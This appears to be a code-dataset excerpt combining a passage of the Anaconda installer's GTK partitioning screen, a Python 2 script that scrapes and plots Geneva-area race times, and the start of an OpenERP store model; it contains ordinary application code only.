col.set_alignment(0.5)
if kind == gobject.TYPE_STRING or kind == gobject.TYPE_INT:
col.set_property('sizing', gtk.TREE_VIEW_COLUMN_AUTOSIZE)
self.columns.append(col)
i += 1
apply(gtk.TreeStore.__init__, types)
self.view = gtk.TreeView(self)
# append all of the columns
map(self.view.append_column, self.columns)
def getTreeView(self):
return self.view
def clearHiddenPartitionsList(self):
self.hiddenPartitions = []
def appendToHiddenPartitionsList(self, member):
self.hiddenPartitions.append(member)
def selectPartition(self, partition):
# if we've hidden this partition in the tree view just return
if partition in self.hiddenPartitions:
return
pyobject = self.titleSlot['PyObject']
iter = self.get_iter_first()
parentstack = [None,]
parent = None
# iterate over the list, looking for the current mouse selection
while iter:
try:
rowpart = self.get_value(iter, pyobject)
except SystemError:
rowpart = None
if rowpart == partition:
path = self.get_path(parent)
self.view.expand_row(path, True)
selection = self.view.get_selection()
if selection is not None:
selection.unselect_all()
selection.select_iter(iter)
path = self.get_path(iter)
col = self.view.get_column(0)
self.view.set_cursor(path, col, False)
self.view.scroll_to_cell(path, col, True, 0.5, 0.5)
return
# if this is a parent node, and it didn't point to the partition
# we're looking for, get the first child and iter over them
elif self.iter_has_child(iter):
parent = iter
parentstack.append(iter)
iter = self.iter_children(iter)
continue
# get the next row.
iter = self.iter_next(iter)
# if there isn't a next row and we had a parent, go to the next
# node after our parent
while not iter and parent:
# pop last parent off of parentstack and resume search at next
# node after the last parent... and don't forget to update the
# variable "parent" to its new value
if len(parentstack) > 0:
iter = self.iter_next(parentstack.pop())
parent = parentstack[-1]
else:
# we've fallen off the end of the model, and we have
# not found the partition
raise RuntimeError, "could not find partition"
""" returns partition 'id' of current selection in tree """
def getCurrentPartition(self):
selection = self.view.get_selection()
model, iter = selection.get_selected()
if not iter:
return None
pyobject = self.titleSlot['PyObject']
try:
val = self.get_value(iter, pyobject)
if type(val) == type("/dev/"):
if val[:5] == '/dev/':
return None
return val
except:
return None
""" Return name of current selected drive (if a drive is highlighted) """
def getCurrentDevice(self):
selection = self.view.get_selection()
model, iter = selection.get_selected()
if not iter:
return None
pyobject = self.titleSlot['PyObject']
try:
val = self.get_value(iter, pyobject)
if type(val) == type("/dev/"):
if val[:5] == '/dev/':
return val
return None
except:
return None
def resetSelection(self):
pass
## selection = self.view.get_selection()
## selection.set_mode(gtk.SELECTION_SINGLE)
## selection.set_mode(gtk.SELECTION_BROWSE)
def clear(self):
selection = self.view.get_selection()
if selection is not None:
selection.unselect_all()
gtk.TreeStore.clear(self)
def __getitem__(self, iter):
if type(iter) == gtk.TreeIter:
return DiskTreeModelHelper(self, self.titleSlot, iter)
raise KeyError, iter
class PartitionWindow(InstallWindow):
def __init__(self, ics):
InstallWindow.__init__(self, ics)
ics.setTitle(_("Partitioning"))
ics.setNextEnabled(True)
self.parent = ics.getICW().window
def quit(self):
pass
def presentPartitioningComments(self,title, labelstr1, labelstr2, comments,
type="ok", custom_buttons=None):
if flags.autostep:
return 1
win = gtk.Dialog(title)
gui.addFrame(win)
if type == "ok":
win.add_button('gtk-ok', 1)
defaultchoice = 0
elif type == "yesno":
win.add_button('gtk-no', 2)
win.add_button('gtk-yes', 1)
defaultchoice = 1
elif type == "continue":
win.add_button('gtk-cancel', 0)
win.add_button(_("Continue"), 1)
defaultchoice = 1
elif type == "custom":
rid=0
for button in custom_buttons:
widget = win.add_button(button, rid)
rid = rid + 1
defaultchoice = rid - 1
image = gtk.Image()
image.set_from_stock('gtk-dialog-warning', gtk.ICON_SIZE_DIALOG)
hbox = gtk.HBox(False, 9)
al=gtk.Alignment(0.0, 0.0)
al.add(image)
hbox.pack_start(al, False)
buffer = gtk.TextBuffer(None)
buffer.set_text(comments)
text = gtk.TextView()
text.set_buffer(buffer)
text.set_property("editable", False)
text.set_property("cursor_visible", False)
text.set_wrap_mode(gtk.WRAP_WORD)
sw = gtk.ScrolledWindow()
sw.add(text)
sw.set_size_request(400, 200)
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.set_shadow_type(gtk.SHADOW_IN)
info1 = gtk.Label(labelstr1)
info1.set_line_wrap(True)
info1.set_size_request(400, -1)
info2 = gtk.Label(labelstr2)
info2.set_line_wrap(True)
info2.set_size_request(400, -1)
vbox = gtk.VBox(False, 9)
al=gtk.Alignment(0.0, 0.0)
al.add(info1)
vbox.pack_start(al, False)
vbox.pack_start(sw, True, True)
al=gtk.Alignment(0.0, 0.0)
al.add(info2)
vbox.pack_start(al, True)
hbox.pack_start(vbox, True, True)
win.vbox.pack_start(hbox)
win.set_position(gtk.WIN_POS_CENTER)
win.set_default_response(defaultchoice)
win.show_all()
rc = win.run()
win.destroy()
return rc
def getNext(self):
(errors, warnings) = self.partitions.sanityCheckAllRequests(self.diskset)
if errors:
labelstr1 = _("The following critical errors exist "
"with your requested partitioning "
"scheme.")
labelstr2 = _("These errors must be corrected prior "
"to continuing with your install of "
"%s.") % (productName,)
commentstr = string.join(errors, "\n\n")
self.presentPartitioningComments(_("Partitioning Errors"),
labelstr1, labelstr2,
commentstr, type="ok")
raise gui.StayOnScreen
if warnings:
labelstr1 = _("The following warnings exist with "
"your requested partition scheme.")
labelstr2 = _("Would you like to continue with "
"your requested partitioning "
"scheme?")
commentstr = string.join(warnings, "\n\n")
rc = self.presentPartitioningComments(_("Partitioning Warnings"),
labelstr1, labelstr2,
commentstr,
type="yesno")
if rc != 1:
raise gui.StayOnScreen
formatWarnings = getPreExistFormatWarnings(self.partitions,
self.diskset)
if formatWarnings:
labelstr1 = _("The following pre-existing partitions have been "
"selected to be formatted, destroying all data.")
# labelstr2 = _("Select 'Yes' to continue and format these "
# "partitions, or 'No' to go back and change these "
# "settings.")
labelstr2 = ""
commentstr = ""
for (dev, type, mntpt) in formatWarnings:
commentstr = commentstr + \
"/dev/%s %s %s\n" % (dev,type,mntpt)
rc = self.presentPartitioningComments(_("Format Warnings"),
labelstr1, labelstr2,
commentstr,
type="custom",
custom_buttons=["gtk-cancel",
_("_Format")])
if rc != 1:
raise gui.StayOnScreen
self.diskStripeGraph.shutDown()
self.tree.clear()
del self.parent
return None
def getPrev(self):
self.diskStripeGraph.shutDown()
self.tree.clear()
del self.parent
return None
def getShortFSTypeName(self, name):
if name == "physical volume (LVM)":
return "LVM PV"
return name
def populate(self, initial = 0):
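        # Rebuild the tree in three passes: LVM volume groups first, then
        # RAID devices, then the physical drives and their partitions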
drives = self.diskset.disks.keys()
drives.sort()
self.tree.resetSelection()
self.tree.clearHiddenPartitionsList()
# first do LVM
lvmrequests = self.partitions.getLVMRequests()
if lvmrequests:
lvmparent = self.tree.append(None)
self.tree[lvmparent]['Device'] = _("LVM Volume Groups")
for vgname in lvmrequests.keys():
vgrequest = self.partitions.getRequestByVolumeGroupName(vgname)
rsize = vgrequest.getActualSize(self.partitions, self.diskset)
vgparent = self.tree.append(lvmparent)
self.tree[vgparent]['Device'] = "%s" % (vgname,)
self.tree[vgparent]['Mount Point'] = ""
self.tree[vgparent]['Start'] = ""
self.tree[vgparent]['End'] = ""
self.tree[vgparent]['Size (MB)'] = "%Ld" % (rsize,)
self.tree[vgparent]['PyObject'] = str(vgrequest.uniqueID)
for lvrequest in lvmrequests[vgname]:
iter = self.tree.append(vgparent)
self.tree[iter]['Device'] = lvrequest.logicalVolumeName
if lvrequest.fstype and lvrequest.mountpoint:
self.tree[iter]['Mount Point'] = lvrequest.mountpoint
else:
self.tree[iter]['Mount Point'] = ""
self.tree[iter]['Size (MB)'] = "%Ld" % (lvrequest.getActualSize(self.partitions, self.diskset),)
self.tree[iter]['PyObject'] = str(lvrequest.uniqueID)
ptype = lvrequest.fstype.getName()
if lvrequest.isEncrypted(self.partitions, True) and lvrequest.format:
self.tree[iter]['Format'] = self.lock_pixbuf
elif lvrequest.format:
self.tree[iter]['Format'] = self.checkmark_pixbuf
self.tree[iter]['IsFormattable'] = lvrequest.fstype.isFormattable()
self.tree[iter]['IsLeaf'] = True
self.tree[iter]['Type'] = ptype
self.tree[iter]['Start'] = ""
self.tree[iter]['End'] = ""
# handle RAID next
raidrequests = self.partitions.getRaidRequests()
if raidrequests:
raidparent = self.tree.append(None)
self.tree[raidparent]['Device'] = _("RAID Devices")
for request in raidrequests:
mntpt = None
if request and request.fstype and request.fstype.getName() == "physical volume (LVM)":
vgreq = self.partitions.getLVMVolumeGroupMemberParent(request)
if vgreq and vgreq.volumeGroupName:
if self.show_uneditable:
mntpt = vgreq.volumeGroupName
else:
self.tree.appendToHiddenPartitionsList(str(request.uniqueID))
continue
else:
mntpt = ""
iter = self.tree.append(raidparent)
if mntpt:
self.tree[iter]["Mount Point"] = mntpt
if request and request.mountpoint:
self.tree[iter]["Mount Point"] = request.mountpoint
if request.fstype:
ptype = self.getShortFSTypeName(request.fstype.getName())
if request.isEncrypted(self.partitions, True) and request.format:
self.tree[iter]['Format'] = self.lock_pixbuf
elif request.format:
self.tree[iter]['Format'] = self.checkmark_pixbuf
self.tree[iter]['IsFormattable'] = request.fstype.isFormattable()
else:
ptype = _("None")
self.tree[iter]['IsFormattable'] = False
try:
device = "/dev/md%d" % (request.raidminor,)
except:
device = "Auto"
self.tree[iter]['IsLeaf'] = True
self.tree[iter]['Device'] = device
self.tree[iter]['Type'] = ptype
self.tree[iter]['Start'] = ""
self.tree[iter]['End'] = ""
self.tree[iter]['Size (MB)'] = "%Ld" % (request.getActualSize(self.partitions, self.diskset),)
self.tree[iter]['PyObject'] = str(request.uniqueID)
# now normal partitions
drvparent = self.tree.append(None)
self.tree[drvparent]['Device'] = _("Hard Drives")
for drive in drives:
disk = self.diskset.disks[drive]
# add a disk stripe to the graph
stripe = self.diskStripeGraph.add(drive, disk)
# add a parent node to the tree
parent = self.tree.append(drvparent)
self.tree[parent]['Device'] = '/dev/%s' % (drive,)
self.tree[parent]['PyObject'] = str('/dev/%s' % (drive,))
sectorsPerCyl = disk.dev.heads * disk.dev.sectors
extendedParent = None
part = disk.next_partition()
while part:
if part.type & parted.PARTITION_METADATA:
part = disk.next_partition(part)
continue
# ignore the tiny < 1 MB partitions (#119479)
if getPartSizeMB(part) <= 1.0:
if not part.is_active() or not part.get_flag(parted.PARTITION_BOOT):
part = disk.next_partition(part)
continue
stripe.add(part)
device = get_partition_name(part)
request = self.partitions.getRequestByDeviceName(device)
if part.type == parted.PARTITION_EXTENDED:
if extendedParent:
raise RuntimeError, ("can't handle more than "
"one extended partition per disk")
extendedParent = self.tree.append(parent)
iter = extendedParent
elif part.type & parted.PARTITION_LOGICAL:
if not extendedParent:
raise RuntimeError, ("crossed logical partition "
"before extended")
iter = self.tree.append(extendedParent)
self.tree[iter]['IsLeaf'] = True
else:
iter = self.tree.append(parent)
self.tree[iter]['IsLeaf'] = True
if request and request.mountpoint:
self.tree[iter]['Mount Point'] = request.mountpoint
else:
self.tree[iter]['Mount Point'] = ""
if request and request.fstype and request.fstype.getName() == "physical volume (LVM)":
vgreq = self.partitions.getLVMVolumeGroupMemberParent(request)
if vgreq and vgreq.volumeGroupName:
if self.show_uneditable:
self.tree[iter]['Mount Point'] = vgreq.volumeGroupName
else:
self.tree.appendToHiddenPartitionsList(part)
part = disk.next_partition(part)
self.tree.remove(iter)
continue
else:
self.tree[iter]['Mount Point'] = ""
if request and request.isEncrypted(self.partitions, True) and request.format:
self.tree[iter]['Format'] = self.lock_pixbuf
elif request and request.format:
self.tree[iter]['Format'] = self.checkmark_pixbuf
if request and request.fstype:
self.tree[iter]['IsFormattable'] = request.fstype.isFormattable()
if part.type & parted.PARTITION_FREESPACE:
ptype = _("Free space")
elif part.type == parted.PARTITION_EXTENDED:
ptype = _("Extended")
elif part.get_flag(parted.PARTITION_RAID) == 1:
ptype = _("software RAID")
parreq = self.partitions.getRaidMemberParent(request)
if parreq:
if self.show_uneditable:
try:
mddevice = "/dev/md%d" % (parreq.raidminor,)
except:
mddevice = "Auto"
self.tree[iter]['Mount Point'] = mddevice
else:
self.tree.appendToHiddenPartitionsList(part)
part = disk.next_partition(part)
self.tree.remove(iter)
continue
else:
self.tree[iter]['Mount Point'] = ""
elif part.fs_type:
if request and request.fstype != None:
ptype = self.getShortFSTypeName(request.fstype.getName())
if ptype == "foreign":
ptype = map_foreign_to_fsname(part.native_type)
else:
ptype = part.fs_type.name
if request and request.isEncrypted(self.partitions, True) and request.format:
self.tree[iter]['Format'] = self.lock_pixbuf
elif request and request.format:
self.tree[iter]['Format'] = self.checkmark_pixbuf
else:
if request and request.fstype != None:
ptype = self.getShortFSTypeName(request.fstype.getName())
if ptype == "foreign":
ptype = map_foreign_to_fsname(part.native_type)
else:
ptype = _("None")
if part.type & parted.PARTITION_FREESPACE:
devname = _("Free")
else:
devname = '/dev/%s' % (device,)
self.tree[iter]['Device'] = devname
self.tree[iter]['Type'] = ptype
self.tree[iter]['Start'] = str(start_sector_to_cyl(disk.dev,
part.geom.start))
self.tree[iter]['End'] = str(end_sector_to_cyl(disk.dev,
part.geom.end))
size = getPartSizeMB(part)
if size < 1.0:
sizestr = "< 1"
else:
sizestr = "%Ld" % (size)
self.tree[iter]['Size (MB)'] = sizestr
self.tree[iter]['PyObject'] = part
part = disk.next_partition(part)
canvas = self.diskStripeGraph.getCanvas()
apply(canvas.set_scroll_region, canvas.root().get_bounds())
self.treeView.expand_all()
def treeActivateCb(self, view, path, col):
if self.tree.getCurrentPartition():
self.editCb()
def treeSelectCb(self, selection, *args):
model, iter = selection.get_selected()
if not iter:
return
partition = model[iter]['PyObject']
if partition:
self.diskStripeGraph.selectSlice(partition)
def newCB(self, widget):
        # create new request with a default size of 100MB
request = NewPartitionSpec(fileSystemTypeGetDefault(), size = 100)
self.editPartitionRequest(request, isNew = 1)
def deleteCb(self, widget):
curselection = self.tree.getCurrentPartition()
if curselection:
if doDeletePartitionByRequest(self.intf, self.partitions, curselection):
self.refresh()
else:
curdevice = self.tree.getCurrentDevice()
if curdevice and len(curdevice) > 5:
if doDeletePartitionsByDevice(self.intf, self.partitions, self.diskset, curdevice[5:]):
self.refresh()
else:
return
def resetCb(self, *args):
if not confirmResetPartitionState(self.intf):
return
self.diskStripeGraph.shutDown()
self.newFsset = self.fsset.copy()
self.diskset.refreshDevices()
self.partitions.setFromDisk(self.diskset)
self.tree.clear()
self.populate()
def refresh(self):
self.diskStripeGraph.shutDown()
self.tree.clear()
# XXXX - Backup some info which doPartitioning munges if it fails
origInfoDict = {}
for request in self.partitions.requests:
try:
origInfoDict[request.uniqueID] = (request.requestSize, request.currentDrive)
except:
pass
try:
autopart.doPartitioning(self.diskset, self.partitions)
rc = 0
except PartitioningError, msg:
try:
for request in self.partitions.requests:
if request.uniqueID in origInfoDict.keys():
(request.requestSize, request.currentDrive) = origInfoDict[request.uniqueID]
except:
log.error("Failed to restore original info")
self.intf.messageWindow(_("Error Partitioning"),
_("Could not allocate requested partitions: %s.") % (msg),
custom_icon="error")
rc = -1
except PartitioningWarning, msg:
# XXX somebody other than me should make this look better
# XXX this doesn't handle the 'delete /boot partition spec' case
# (it says 'add anyway')
dialog = gtk.MessageDialog(self.parent, 0, gtk.MESSAGE_WARNING,
gtk.BUTTONS_NONE,
_("Warning: %s.") % (msg))
gui.addFrame(dialog)
button = gtk.Button(_("_Modify Partition"))
dialog.add_action_widget(button, 1)
button = gtk.Button(_("_Continue"))
dialog.add_action_widget(button, 2)
dialog.set_position(gtk.WIN_POS_CENTER)
dialog.show_all()
rc = dialog.run()
dialog.destroy()
if rc == 1:
rc = -1
else:
rc = 0
reqs = self.partitions.getBootableRequest()
if reqs:
for req in reqs:
req.ignoreBootConstraints = 1
if not rc == -1:
self.populate()
return rc
def editCb(self, *args):
part = self.tree.getCurrentPartition()
(type, request) = doEditPartitionByRequest(self.intf, self.partitions,
part)
if request:
if type == "RAID":
self.editRaidRequest(request)
elif type == "LVMVG":
self.editLVMVolumeGroup(request)
elif type == "LVMLV":
vgrequest = self.partitions.getRequestByID(request.volumeGroup)
self.editLVMVolumeGroup(vgrequest)
elif type == "NEW":
self.editPartitionRequest(request, isNew = 1)
else:
self.editPartitionRequest(request)
# isNew implies that this request has never been successfully used before
def editRaidRequest(self, raidrequest, isNew = 0):
raideditor = raid_dialog_gui.RaidEditor(self.partitions,
self.diskset, self.intf,
self.parent, raidrequest,
isNew)
origpartitions = self.partitions.copy()
while 1:
request = raideditor.run()
if request is None:
return
if not isNew:
self.partitions.removeRequest(raidrequest)
if raidrequest.getPreExisting():
delete = partRequests.DeleteRAIDSpec(raidrequest.raidminor)
self.partitions.addDelete(delete)
self.partitions.addRequest(request)
if self.refresh():
if not isNew:
self.partitions = origpartitions.copy()
if self.refresh():
raise RuntimeError, ("Returning partitions to state "
"prior to RAID edit failed")
continue
else:
break
raideditor.destroy()
def editPartitionRequest(self, origrequest, isNew = 0, restrictfs = None):
parteditor = partition_dialog_gui.PartitionEditor(self.anaconda,
self.parent,
origrequest,
isNew = isNew,
restrictfs = restrictfs)
while 1:
request = parteditor.run()
if request is None:
return 0
if not isNew:
self.partitions.removeRequest(origrequest)
self.partitions.addRequest(request)
if self.refresh():
# the add failed; remove what we just added and put
# back what was there if we removed it
self.partitions.removeRequest(request)
if not isNew:
self.partitions.addRequest(origrequest)
if self.refresh():
# this worked before and doesn't now...
raise RuntimeError, ("Returning partitions to state "
"prior to edit failed")
else:
break
parteditor.destroy()
return 1
def editLVMVolumeGroup(self, origvgrequest, isNew = 0):
vgeditor = lvm_dialog_gui.VolumeGroupEditor(self.partitions,
self.diskset,
self.intf, self.parent,
origvgrequest, isNew)
origpartitions = self.partitions.copy()
origvolreqs = origpartitions.getLVMLVForVG(origvgrequest)
while (1):
rc = vgeditor.run()
#
# return code is either None or a tuple containing
# volume group request and logical volume requests
#
if rc is None:
return
(vgrequest, logvolreqs) = rc
# first add the volume group
if not isNew:
# if an lv was preexisting and isn't in the new lv requests,
# we need to add a delete for it.
for lv in origvolreqs:
if not lv.getPreExisting():
continue
found = 0
for newlv in logvolreqs:
if (newlv.getPreExisting() and
newlv.logicalVolumeName == lv.logicalVolumeName):
found = 1
break
if found == 0:
delete = partRequests.DeleteLogicalVolumeSpec(lv.logicalVolumeName,
origvgrequest.volumeGroupName)
self.partitions.addDelete(delete)
for lv in origvolreqs:
self.partitions.removeRequest(lv)
self.partitions.removeRequest(origvgrequest)
vgID = self.partitions.addRequest(vgrequest)
# now add the logical volumes
for lv in logvolreqs:
lv.volumeGroup = vgID
if not lv.getPreExisting():
lv.format = 1
self.partitions.addRequest(lv)
if self.refresh():
if not isNew:
self.partitions = origpartitions.copy()
if self.refresh():
raise RuntimeError, ("Returning partitions to state "
"prior to edit failed")
continue
else:
break
vgeditor.destroy()
def makeLvmCB(self, widget):
if (not fileSystemTypeGet('physical volume (LVM)').isSupported() or
not lvm.has_lvm()):
self.intf.messageWindow(_("Not supported"),
_("LVM is NOT supported on "
"this platform."), type="ok",
custom_icon="error")
return
request = VolumeGroupRequestSpec(format = True)
self.editLVMVolumeGroup(request, isNew = 1)
return
def makeraidCB(self, widget):
if not fileSystemTypeGet('software RAID').isSupported():
self.intf.messageWindow(_("Not supported"),
_("Software RAID is NOT supported on "
"this platform."), type="ok",
custom_icon="error")
return
availminors = self.partitions.getAvailableRaidMinors()
if len(availminors) < 1:
self.intf.messageWindow(_("No RAID minor device numbers available"),
_("A software RAID device cannot "
"be created because all of the "
"available RAID minor device numbers "
"have been used."),
type="ok", custom_icon="error")
return
# see if we have enough free software RAID partitions first
# if no raid partitions exist, raise an error message and return
request = RaidRequestSpec(fileSystemTypeGetDefault())
availraidparts = self.partitions.getAvailRaidPartitions(request,
self.diskset)
dialog = gtk.Dialog(_("RAID Options"), self.parent)
gui.addFrame(dialog)
dialog.add_button('gtk-cancel', 2)
dialog.add_button('gtk-ok', 1)
dialog.set_position(gtk.WIN_POS_CENTER)
maintable = gtk.Table()
maintable.set_row_spacings(5)
maintable.set_col_spacings(5)
row = 0
lbltxt = _("Software RAID allows you to combine "
"several disks into a larger "
"RAID device. A RAID device can be configured to "
"provide additional speed and "
"reliability compared to using an individual drive. "
"For more information on using RAID devices "
"please consult the %s documentation.\n\n"
"You currently have %s software RAID "
"partition(s) free to use.\n\n") % (productName, len(availraidparts))
if len(availraidparts) < 2:
lbltxt = lbltxt + _("To use RAID you must first "
"create at least two partitions of type "
"'software RAID'. Then you can "
"create a RAID device which can "
"be formatted and mounted.\n\n")
lbltxt = lbltxt + _("What do you want to do now?")
lbl = gui.WrappingLabel(lbltxt)
maintable.attach(lbl, 0, 1, row, row + 1)
row = row + 1
newminor = availminors[0]
radioBox = gtk.VBox (False)
createRAIDpart = gtk.RadioButton(None, _("Create a software RAID _partition."))
radioBox.pack_start(createRAIDpart, False, False, padding=10)
createRAIDdev = gtk.RadioButton(createRAIDpart,
_("Create a RAID _device [default=/dev/md%s].") % newminor)
radioBox.pack_start(createRAIDdev, False, False, padding=10)
doRAIDclone = gtk.RadioButton(createRAIDpart,
_("Clone a _drive to create a "
"RAID device [default=/dev/md%s].") % newminor)
radioBox.pack_start(doRAIDclone, False, False, padding=10)
createRAIDpart.set_active(1)
doRAIDclone.set_sensitive(0)
createRAIDdev.set_sensitive(0)
if len(availraidparts) > 0 and len(self.diskset.disks.keys()) > 1:
doRAIDclone.set_sensitive(1)
if len(availraidparts) > 1:
createRAIDdev.set_active(1)
createRAIDdev.set_sensitive(1)
align = gtk.Alignment(0.5, 0.0)
align.add(radioBox)
maintable.attach(align,0,1,row, row+1)
row = row + 1
maintable.show_all()
dialog.vbox.pack_start(maintable)
dialog.show_all()
rc = dialog.run()
dialog.destroy()
if rc == 2:
return
# see which option they choose
if createRAIDpart.get_active():
rdrequest = NewPartitionSpec(fileSystemTypeGet("software RAID"), size = 100)
rc = self.editPartitionRequest(rdrequest, isNew = 1, restrictfs=["software RAID"])
elif createRAIDdev.get_active():
self.editRaidRequest(request, isNew=1)
else:
cloneDialog = raid_dialog_gui.RaidCloneDialog(self.partitions,
self.diskset,
self.intf,
self.parent)
if cloneDialog is None:
self.intf.messageWindow(_("Couldn't Create Drive Clone Editor"),
_("The drive clone editor could not "
"be created for some reason."),
custom_icon="error")
return
while 1:
rc = cloneDialog.run()
if rc:
self.refresh()
cloneDialog.destroy()
return
def viewButtonCB(self, widget):
self.show_uneditable = not widget.get_active()
self.diskStripeGraph.shutDown()
self.tree.clear()
self.populate()
def getScreen(self, anaconda):
self.anaconda = anaconda
self.fsset = anaconda.id.fsset
self.diskset = anaconda.id.diskset
self.intf = anaconda.intf
self.diskset.openDevices()
self.partitions = anaconda.id.partitions
self.show_uneditable = 1
checkForSwapNoMatch(anaconda)
# XXX PartitionRequests() should already exist and
# if upgrade or going back, have info filled in
# self.newFsset = self.fsset.copy()
# load up checkmark
self.checkmark_pixbuf = gtk.gdk.pixbuf_new_from_inline(len(new_checkmark), new_checkmark, False)
self.lock_pixbuf = gui.getPixbuf("gnome-lock.png")
# operational buttons
buttonBox = gtk.HButtonBox()
buttonBox.set_layout(gtk.BUTTONBOX_SPREAD)
ops = ((_("Ne_w"), self.newCB),
(_("_Edit"), self.editCb),
(_("_Delete"), self.deleteCb),
(_("Re_set"), self.resetCb),
(_("R_AID"), self.makeraidCB),
(_("_LVM"), self.makeLvmCB))
for label, cb in ops:
button = gtk.Button(label)
buttonBox.add (button)
button.connect ("clicked", cb)
self.tree = DiskTreeModel()
self.treeView = self.tree.getTreeView()
self.treeView.connect('row-activated', self.treeActivateCb)
self.treeViewSelection = self.treeView.get_selection()
self.treeViewSelection.connect("changed", self.treeSelectCb)
# set up the canvas
self.diskStripeGraph = DiskStripeGraph(self.tree, self.editCb)
# do the initial population of the tree and the graph
self.populate(initial = 1)
vpaned = gtk.VPaned()
hadj = gtk.Adjustment(step_incr = 5.0)
vadj = gtk.Adjustment(step_incr = 5.0)
sw = gtk.ScrolledWindow(hadjustment = hadj, vadjustment = vadj)
sw.add(self.diskStripeGraph.getCanvas())
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.set_shadow_type(gtk.SHADOW_IN)
frame = gtk.Frame()
frame.add(sw)
vpaned.add1(frame)
box = gtk.VBox(False, 5)
box.pack_start(buttonBox, False)
sw = gtk.ScrolledWindow()
sw.add(self.treeView)
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.set_shadow_type(gtk.SHADOW_IN)
box.pack_start(sw, True)
self.toggleViewButton = gtk.CheckButton(_("Hide RAID device/LVM Volume _Group members"))
self.toggleViewButton.set_active(not self.show_uneditable)
self.toggleViewButton.connect("toggled", self.viewButtonCB)
box.pack_start(self.toggleViewButton, False, False)
vpaned.add2(box)
# XXX should probably be set according to height
vpaned.set_position(175)
return vpaned
|
sergey-senozhatsky/anaconda-11-vlan-support
|
iw/partition_gui.py
|
Python
|
gpl-2.0
| 50,370
|
import urllib2
import re
import math
from datetime import datetime
from collections import namedtuple
import operator
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import lxml.html
import pandas as pd
meyrin_url = "http://services.datasport.com/%i/lauf/meyrin/RANG091.HTM"
semi_url = "http://services.datasport.com/%i/lauf/genevema/RANG095.HTM"
f_meyrin_url = "http://services.datasport.com/%i/lauf/meyrin/RANG092.HTM"
f_semi_url = "http://services.datasport.com/%i/lauf/genevema/RANG096.HTM"
def get_data(url, year):
return urllib2.urlopen(url%(year)).read()
def runners(results_page, matcher, detail=False):
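    # Scrape one datasport results page: pull the fixed-width result lines
    # out of the size-2 <font> blocks and map hash(name) -> (time, name)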
observations = []
results_table = lxml.html.fromstring(results_page)
#lines = results_table.body.find("pre").findall("font")[2].text_content()
fonts = results_table.body.find("pre").findall("font")
fonts = [e for e in fonts if e.attrib.get('size', "0")=="2"]
lines = "".join(e.text_content() for e in fonts)
lines = [l.strip() for l in lines.split("\r\n")]
lines = [l for l in lines if l]
runners = {}
for line in lines:
if detail:
print line.encode('utf-8')
match = matcher(line, detail)
if match is not None:
surname, name, time = match
if time[0].isnumeric():
key = surname.encode('utf-8') +" "+name.encode('utf-8')
if detail:
print key, time
print "-"*80
runners[hash(key)] = (time, key)
return runners
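# Column layouts differ between the two result pages: the finishing time sits
# six fields from the end on the half-marathon pages and five on the Meyrin pages.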
def semier(line, detail=False):
l = line.split()
time = l[-6]
name = l[1]
surname = l[2]
if time[0].isnumeric():
if detail:
print name.encode('utf-8'), surname.encode('utf-8'), time
print "-"*80
return name, surname, time
def meyriner(line, detail=False):
l = line.split()
time = l[-5]
name = l[1]
surname = l[2]
if time[0].isnumeric():
if detail:
print name.encode('utf-8'), surname.encode('utf-8'), time
print "-"*80
return name, surname, time
def seconds(t):
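    # Convert a time string "H:MM.SS" or "MM.SS" to seconds; assumes at most
    # a single hours digit, as in these race listings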
secs = 0
if ":" in t:
secs += int(t[0]) * 60*60
t = t[2:]
mins = int(t[:2])
secs += mins*60
secs += int(t[3]+t[4])
return secs
def nice_time(x, pos):
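    # matplotlib FuncFormatter callback: render an axis value in seconds as
    # "H:MM.SS", or "MM.SS" for values under an hour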
mins, hrs = math.modf(x/3600.)
secs, mins = math.modf(mins * 60)
secs *= 60
if hrs > 0:
return "%i:%02i.%02i"%(hrs, mins, secs)
else:
return "%02i.%02i"%(mins, secs)
if __name__ == "__main__":
meyrin = []
semi = []
    # Use the Foulees of year N to predict the semi time in year N+1
for year in (2010, 2011):
a = runners(get_data(meyrin_url, year), meyriner, detail=False)
a.update(runners(get_data(f_meyrin_url, year), meyriner, detail=False))
b = runners(get_data(semi_url, year+1), semier, detail=False)
b.update(runners(get_data(f_semi_url, year+1), semier, detail=False))
a_ = set(a.keys())
b_ = set(b.keys())
both = [(a[runner][1], a[runner][0], b[runner][0]) for runner in a_.intersection(b_)]
print "In the year", year, len(both), "runners ran both the Foulees and the semi"
print "Runners sorted by semi marathon time"
print
for name, time1, time2 in sorted(both, key=operator.itemgetter(2)):
print name, time1, time2
meyrin.append(seconds(time1))
semi.append(seconds(time2))
meyrin = np.asarray(meyrin)
semi = np.asarray(semi)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.grid(True)
ax.hexbin(meyrin, semi, cmap=plt.cm.PuBu)
ax.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(nice_time))
ax.set_xlabel("Foulees automnales de Meyrin 10k")
ax.yaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(nice_time))
ax.set_ylabel("Geneva half marathon")
plt.show()
fig.savefig("/tmp/meyrin-vs-geneva.png")
|
betatim/toys
|
run-times.py
|
Python
|
gpl-2.0
| 4,019
|
# -*- coding: utf-8 -*-
import datetime
import time
import utildate
from openerp.osv import fields, osv
from openerp.tools.translate import _
class Store(osv.osv):
_name = "tms.store"
def name_get(self,cr,uid,ids,context=None):
res=[]
display_widget=None
if context:
display_widget = context.get("display_widget",None)
for r in self.read(cr,uid,ids,['name','storenum']):
if display_widget =="dropdownlist":
res.append((r['id'],'(%s)%s'%(r['storenum'],r['name'])))
else:
res.append((r['id'],r['name']))
return res
def name_search(self,cr,uid,name="",args=None,operator="ilike",context=None,limit=100):
if not args:
args=[]
if not context:
context={}
ids=[]
if name:
ids = self.search(cr, uid, [('storenum',operator,name)]+ args, limit=limit, context=context)
if not ids:
ids = self.search(cr, uid, [('name',operator,name)]+ args, limit=limit, context=context)
return self.name_get(cr, uid, ids, context=context)
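    # Illustrative behaviour (added comment; store data assumed): for a store
    # named "Airport" with storenum "S012", name_get() renders "(S012)Airport"
    # when the context carries {'display_widget': 'dropdownlist'} and plain
    # "Airport" otherwise; name_search() matches on storenum first and falls
    # back to the store name.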
_columns = {
"name":fields.char(string="Store Name", required=True, size=200),
"storenum":fields.char(string="Store num", required=True, size=100),
